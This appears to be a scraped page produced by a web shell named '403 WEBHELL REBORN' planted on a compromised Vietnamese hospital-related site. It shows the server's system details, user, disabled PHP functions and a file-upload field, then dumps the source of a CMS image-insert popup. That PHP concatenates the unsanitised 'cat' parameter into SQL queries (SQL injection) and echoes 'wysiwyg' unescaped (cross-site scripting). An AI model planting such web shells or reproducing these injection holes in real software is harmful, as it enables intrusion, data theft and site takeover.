403 WEBHELL REBORN

ÿØÿà JFIF ` ` ÿþ 403 WEBHELL REBORN 403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory : /home/benhviencoc7/public_html/data/javascripts/editor/popups/
Upload File :
Current File : /home/benhviencoc7/public_html/data/javascripts/editor/popups/insert_image.php
<?php 
define('CILY',true);
include('../../../../#includes/config.php');
@include('../languages/vi.php');

if(check_log() == true & check_level() >= 2) {
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
	<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" type="text/css" href="style.css" />
    <link href="sort2.css" rel="stylesheet" type="text/css" />

    <link rel="stylesheet" type="text/css" href="../styles/layout.css" />
    <script type="text/javascript" src="../../jquery-1.4.2.min.js" ></script>
    <script type="text/javascript" src="../../avim.js" ></script>
    <script language="JavaScript" type="text/javascript">
    
    /* ---------------------------------------------------------------------- *\
      Function    : insertImage()
      Description : Inserts image into the WYSIWYG.
    \* ---------------------------------------------------------------------- */
    function insertImage() {
      var image = '<div style="text-align: '+$('#align').val()+'"><img src="' + $('#url').val() + '" title="' + $('#description').val() + '" alt="' + $('#title').val() + '" width="' + $('#w').val() + '" height="' + $('#h').val() + '"></div>';
      
      <?php if($_GET['type']=='up') { ?>
        $.ajax({
            type: 'POST', url: '../update.php', data: 'url=' + $('#url').val() + '&cat=' + $('#cat').val() + '&title=' + $('#title').val() + '&desc=' + $('#description').val(),
            complete: function(){
//                parent.insertHTML(image, '<?php echo $_GET['wysiwyg'] ?>');
                parent.insertHtml(image);
                parent.$.akModalRemove();
            }
        });
      <?php } else { ?>
//        parent.insertHTML(image, '<?php echo $_GET['wysiwyg'] ?>');
        parent.insertHtml(image);
        parent.$.akModalRemove();
      <?php } ?>
    }
    
    </script>
    <script language="javascript">
            function viewproduct(M31cats){
                window.location='insert_image.php?type=lib&cat='+M31cats;
            }
    </script>
</head>
<body>
    <div id="content-wrapper">
        <div class="col-md-12">
            <div class="row">
              <div class="col-lg-12">
                <ul class="nav nav-tabs">
                    <li></li>
                    <li<?php if($_GET['type']=='up') echo ' class="curent"'; ?>><a href="insert_image.php?wysiwyg=<?php echo $_GET['wysiwyg']; ?>&type=up" target="_self"><?php echo $language['editer_insert_up']; ?></a></li>
                    <li<?php if($_GET['type']=='url') echo ' class="curent"'; ?>><a href="insert_image.php?wysiwyg=<?php echo $_GET['wysiwyg']; ?>&type=url" target="_self"><?php echo $language['editer_insert_url']; ?></a></li>
                    <li<?php if($_GET['type']=='lib') echo ' class="curent"'; ?>><a href="insert_image.php?wysiwyg=<?php echo $_GET['wysiwyg']; ?>&type=lib" target="_self"><?php echo $language['editer_insert_lib']; ?></a></li>
                <br clear="all"/>
                </ul>
                  <div class="row">
                    <div class="col-md-12">
                      <div class="main-box" style="height: 263px;">
                        <?php if($_GET['type']=='up'){ ?>
                            <script type="text/javascript" src="../ajaxupload.js" ></script>
                            <script type="text/javascript">
                            $(document).ready(function(){
                                var button = $('#upload'), interval;
                                new AjaxUpload(button, {
                                    action: '../upload.php?type=image', 
                                    onSubmit : function(file, ext){
                                     
                                        if (ext && /^(jpg|png|jpeg|JPG|GIF|PNG|JPEG|gif)$/.test(ext)){      
                                            button.text('<?php echo $language['editer_uploading']; ?>');
                                                            
                                            this.disable();
                                            
                                            interval = window.setInterval(function(){
                                                var text = button.text();
                                                if (text.length < '<?php echo $language['editer_uploading']; ?>'.length+5){
                                                    button.text(text + '.');                    
                                                } else {
                                                    button.text('<?php echo $language['editer_uploading']; ?>');                
                                                }
                                            }, 200);
                                        } else {                    
                                            alert('<?php echo $language['editer_not_type']; ?>');
                                            return false;               
                                        }
                                    },
                                    onComplete: function(file, response){
                                        button.text('<?php echo $language['editer_finish']; ?>');           
                                        window.clearInterval(interval);
                                        $('.info').show();
                                        $('.file').html('<img style="border: 1px solid #ccc" src="<?php echo get_option('url'); ?>/data/uploads/images/thumbs-'+response+'" /><input id="url" type="hidden" value="<?php echo get_option('url'); ?>/data/uploads/images/'+response+'" />');                     
                                    }
                                });
                                
                            });
                            </script>
                            

                            <h2><?php echo $language['editer_image_up_t']; ?></h2>
                            
                            <table>
                                <tr>
                                    <td valign="top">
                                        <button id="upload" class="btn btn-danger ladda-button"><span class="ladda-label"><?php echo $language['editer_upload']; ?></span></button>
                                    </td>
                                    <td style="padding-left: 10px;">
                                        <p><?php echo $language['editer_size']; ?>: 2Mb</p>
                                        <p><?php echo $language['editer_type']; ?>: jpg, png, jpeg, gif</p>
                                        <p style="color: red;">(*) <?php echo $language['editer_warning']; ?></p>
                                    </td>
                                </tr>
                            </table>
                            

                            
                            <hr style="margin: 10px 0;border: 1px solid #ccc">
                            <ol>
                                <li class="file" style="height: 150px; overflow: hidden; width: 130px; overflow: hidden;"></li>
                                <li class="info">
                                    <table>
                                    <tr>
                                        <td colspan="2">
                                            <div style="max-width: 210px; overflow: hidden;">                 
                                                <select name="cat" id="cat" class="form-control">
                                                <?php echo getSubcat(); ?>
                                                </select>
                                            </div>

                                        </td>
                                    </tr>

                                    <tr>
                                        <td colspan="2"><input class="form-control" type="text" id="title" style="width: 100%;" value="" placeholder="<?php echo $language['editer_name']; ?>" /></td>
                                    </tr>
                                    <tr>
                                        <td colspan="2"><textarea class="form-control" id="description" style="width: 100%; height: 40px;" placeholder="<?php echo $language['editer_description']; ?>"></textarea></td>
                                    </tr>
                                    <tr>
                                        <td width="60%"><select id="align" class="form-control">
                                            <option value="">Căn lề</option>
                                            <option value="Left"><?php echo $language['editer_table_left']; ?></option>
                                            <option value="Right"><?php echo $language['editer_table_right']; ?></option>
                                            <option value="Center"><?php echo $language['editer_table_center']; ?></option>
                                            <option value="justify"><?php echo $language['editer_table_justify']; ?></option>
                                            </select>
                                        </td>
                                        <td width="40%" style="padding-left: 8px"><input class="form-control" id="w" type="text" style="width: 60px;" value="650" /></td>
                                    </tr>
                                    
                                    </table>
                                </li>
                            </ol>
                            <?php } elseif($_GET['type']=='url'){ ?>
                            <h2><?php echo $language['editer_image_url_t']; ?></h2>
                            <ul class="url">
                                <li>
                                    <table width="100%">
                                   
                                    <tr>
                                        <td colspan="2"><input class="form-control" type="text" id="url" placeholder="URL hình ảnh" /></td>
                                    </tr>
                                    <tr>
                                        <td colspan="2"><input class="form-control" type="text" id="title" placeholder="<?php echo $language['editer_name']; ?>" /></td>
                                    </tr>
                                    <tr>
                                        <td colspan="2"><textarea class="form-control" id="description" placeholder="<?php echo $language['editer_description']; ?>"></textarea></td>
                                    </tr>
                                    <tr>
                                        <td width="60%"><select id="align" class="form-control">
                                            <option value="">Căn lề</option>
                                            <option value="Left"><?php echo $language['editer_table_left']; ?></option>
                                            <option value="Right"><?php echo $language['editer_table_right']; ?></option>
                                            <option value="Center"><?php echo $language['editer_table_center']; ?></option>
                                            <option value="justify"><?php echo $language['editer_table_justify']; ?></option>
                                        </select></td>
                                        <td width="40%" style="padding-left: 10px"><input id="w" type="text" style="width: 60px;" value="650" class="form-control"/></td>
                                    </tr>
                                    </table>
                                </li>
                            </ul>
                            <?php } elseif($_GET['type']=='lib'){ ?>
                            <script language="javascript">
                                $(document).ready(function(){
                                    $('#imgdemo > span > img').click(function(){
                                        $('#imgdemo').hide();  
                                        $('.info').show();
                                        $('.file').html('<img src="' + $(this).attr('src') + '" /><input id="url" type="hidden" value="' + $(this).attr('value') + '" />');
                                        $('#title').val($(this).attr('name')); 
                                        $('#description').text($(this).attr('desc'))
                                    });
                                });
                            </script>
                            <select name="FilterByCat" id="M31cats" onchange="return(viewproduct(this.value,'','3','3'));" class="form-control">
                                <?php echo getSubcat(); ?>
                            </select>
                            <div id="imgdemo" style="text-align: center;" class="scroll_box">
                                <?php 
                                    if($_GET['cat']) {
                                        $modpage = '&cat='.$_GET['cat'];
                                        $pd_where = 'AND data_cat = '.$_GET['cat'];
                                    }
                                    $current_page = ($_GET['page'])?$_GET['page']:1;
                                    $start = 50*($current_page-1);
                                    $datas = @mysql_query("SELECT * FROM cily_datas WHERE data_type = 1 ".$pd_where." ORDER BY id DESC LIMIT ".$start.",50");
                                    $total = @mysql_num_rows(@mysql_query("SELECT * FROM cily_datas WHERE data_type = 1 ".$pd_where.""));
                                    while ($data = mysql_fetch_array ($datas))
                                    {
                                ?>
                                <span class="demo">
                                    <img title="<?php echo $language['editer_ok']; ?>" src="<?php echo $data['data_thumb']; ?>" onError="this.src='<?php echo get_option('url'); ?>/data/javascripts/editor/icons/error.png';" value="<?php echo $data['data_url']; ?>" name="<?php echo $data['data_name']; ?>" desc="<?php echo $data['data_info']; ?>" class="profile-img img-responsive center-block"/>
                                    <p>
                                    <?php 
                                        $imgsize = filesize(str_replace(get_option('url'),'../../../..',$data['data_url'])); 
                                        if ($imgsize >= 1000000) {echo '<font color="red">'.format_size($imgsize).'</font>';}
                                        else {echo format_size($imgsize);}
                                    ?></p>
                                </span>
                                <?php
                                    }
                                 ?>

                                <br clear="all" />
                            </div>
                            <ol>

                                <li class="file" style="overflow: hidden; width: 160px; overflow: hidden; max-height: 120px;"></li>
                                <li class="info">
                                    <table>
                                    <tr>
                                        <td colspan="2"><input class="form-control" type="text" id="title" style="width: 100%;" placeholder="<?php echo $language['editer_name']; ?>"/></td>
                                    </tr>
                                    <tr>
                                        <td colspan="2"><textarea class="form-control" id="description" style="width: 100%;" placeholder="<?php echo $language['editer_description']; ?>"></textarea></td>
                                    </tr>
                                    <tr>
                                        <td width="60%"><select id="align" class="form-control">
                                            <option value="">Căn lề</option>
                                            <option value="Left"><?php echo $language['editer_table_left']; ?></option>
                                            <option value="Right"><?php echo $language['editer_table_right']; ?></option>
                                            <option value="Center"><?php echo $language['editer_table_center']; ?></option>
                                            <option value="justify"><?php echo $language['editer_table_justify']; ?></option>
                                        </select></td>
                                        <td width="40%" style="padding-left: 10px"><input id="w" type="text" style="width: 60px;" value="650" class="form-control"/></td>
                                    </tr>

                                    </table>
                                </li>
                            </ol>

                            <div class="">
                                <?php 
                                    echo pagingindex(50,$current_page, $total, 'insert_image.php?wysiwyg='.$_GET['wysiwyg'].'&type=lib&action=' . $_GET['action'],$modpage.'&page=' ,false)
                                    
                                ?>
                                </div>
                            <?php } ?>
                      </div>
                    </div>
                  </div>
                </div>
            </div>
        </div>
        <div align="right" style="padding-top: 5px;"><input type="submit" value="<?php echo $language['editer_insert']; ?>" onClick="insertImage();" style="font-size: 12px;" />&nbsp;<input type="submit" value="<?php echo $language['editer_cancel']; ?>" onClick="parent.$.akModalRemove();" style="font-size: 12px;" /></div>
    </div>

</body>
</html>
<?php }

else echo "Hacking attempt";
?>
Anon7 - 2021